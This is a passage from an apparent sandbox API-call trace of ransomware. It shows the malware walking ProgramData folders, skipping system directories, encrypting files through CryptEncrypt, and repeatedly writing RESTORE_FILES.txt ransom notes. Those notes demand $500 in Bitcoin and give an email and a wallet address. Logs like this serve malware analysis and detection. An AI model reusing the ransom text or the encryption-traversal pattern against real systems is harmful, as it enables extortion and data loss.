(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.116] WriteFile (in: hFile=0xd4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.116] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.116] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0072.116] CloseHandle (hObject=0xd4) returned 1 [0072.116] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.116] lstrcmpiW (lpString1="SentItems", lpString2="Windows") returned -1 [0072.116] lstrcmpiW (lpString1="SentItems", lpString2="Program Files") returned 1 [0072.116] lstrcmpiW (lpString1="SentItems", lpString2="Program Files (x86)") returned 1 [0072.116] lstrcmpiW (lpString1="SentItems", lpString2="$Recycle.bin") returned 1 [0072.116] lstrcmpiW (lpString1="SentItems", lpString2="System Volume Information") returned -1 [0072.116] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 55 [0072.116] lstrcmpW (lpString1="SentItems", lpString2=".") returned 1 [0072.116] lstrcmpW (lpString1="SentItems", lpString2="..") returned 1 [0072.116] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*") returned 57 [0072.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.116] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 
[0072.116] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.116] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.117] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.117] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\.") returned 57 [0072.117] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.117] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.117] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.117] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.117] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.117] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.117] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\..") returned 58 [0072.117] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.117] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.117] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.117] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\RESTORE_FILES.txt") returned 73 [0072.117] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\sentitems\\restore_files.txt"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.126] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.126] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.127] lstrlenA (lpString="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") returned 684 [0072.127] WriteFile (in: hFile=0xd4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.127] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.127] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0072.127] CloseHandle (hObject=0xd4) returned 1 [0072.127] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0072.127] lstrcmpiW (lpString1="VirtualInbox", lpString2="Windows") returned -1 [0072.127] lstrcmpiW (lpString1="VirtualInbox", lpString2="Program Files") returned 1 [0072.127] lstrcmpiW (lpString1="VirtualInbox", lpString2="Program Files (x86)") returned 1 [0072.127] lstrcmpiW (lpString1="VirtualInbox", lpString2="$Recycle.bin") returned 1 [0072.127] lstrcmpiW (lpString1="VirtualInbox", lpString2="System Volume Information") returned 1 [0072.127] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 58 [0072.127] lstrcmpW (lpString1="VirtualInbox", lpString2=".") returned 1 [0072.127] lstrcmpW (lpString1="VirtualInbox", lpString2="..") returned 1 [0072.127] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned 60 [0072.128] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0072.128] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0072.128] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.128] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.128] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.128] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.128] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\.") returned 60 [0072.128] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.128] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.128] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.128] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.128] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.128] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.128] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.128] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\..") returned 61 [0072.128] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.128] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0072.128] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0072.128] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0072.128] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0072.128] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0072.128] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0072.128] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 64 [0072.128] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0072.128] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0072.129] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned 66 [0072.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0072.448] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.448] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.448] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.448] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.448] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.448] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\.") returned 66 [0072.448] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.448] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.448] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.448] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.448] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.448] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.448] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.448] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\..") returned 67 [0072.448] lstrcmpW 
(lpString1="..", lpString2=".") returned 1 [0072.448] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.448] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0072.448] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Windows") returned -1 [0072.448] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Program Files") returned 1 [0072.448] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="Program Files (x86)") returned 1 [0072.448] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="$Recycle.bin") returned 1 [0072.448] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="System Volume Information") returned 1 [0072.448] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") returned 79 [0072.448] StrStrIW (lpFirst="WelcomeFax.tif", lpSrch=".protected") returned 0x0 [0072.449] lstrcmpW (lpString1="WelcomeFax.tif", lpString2="RESTORE_FILES.txt") returned 1 [0072.449] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0072.449] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0072.449] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.449] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0072.449] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0072.449] wnsprintfW (in: 
pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\RESTORE_FILES.txt") returned 82 [0072.449] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0072.451] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.451] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0072.454] lstrlenA (lpString="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") returned 684 [0072.454] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0072.454] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.454] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.454] CloseHandle (hObject=0xd8) returned 1 [0072.454] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0072.454] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0072.454] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\RESTORE_FILES.txt") returned 76 [0072.454] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0072.455] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.455] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0072.456] lstrlenA (lpString="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") returned 684 [0072.456] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0072.456] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.456] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.456] CloseHandle (hObject=0xd4) returned 1 [0072.457] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0072.457] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0072.457] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\RESTORE_FILES.txt") returned 63 [0072.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0072.458] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.458] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0072.458] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0072.458] WriteFile (in: hFile=0xb4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0072.458] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.458] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0072.458] CloseHandle (hObject=0xb4) returned 1 [0072.459] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.459] lstrcmpiW (lpString1="MSScan", lpString2="Windows") returned -1 [0072.459] lstrcmpiW (lpString1="MSScan", lpString2="Program Files") returned -1 [0072.459] lstrcmpiW (lpString1="MSScan", lpString2="Program Files (x86)") returned -1 [0072.459] lstrcmpiW (lpString1="MSScan", lpString2="$Recycle.bin") returned 1 [0072.459] lstrcmpiW (lpString1="MSScan", lpString2="System Volume Information") returned -1 [0072.459] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan") returned 46 [0072.459] lstrcmpW (lpString1="MSScan", lpString2=".") returned 1 [0072.459] lstrcmpW (lpString1="MSScan", lpString2="..") returned 1 [0072.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*") returned 48 [0072.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0072.459] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.459] lstrcmpiW (lpString1=".", 
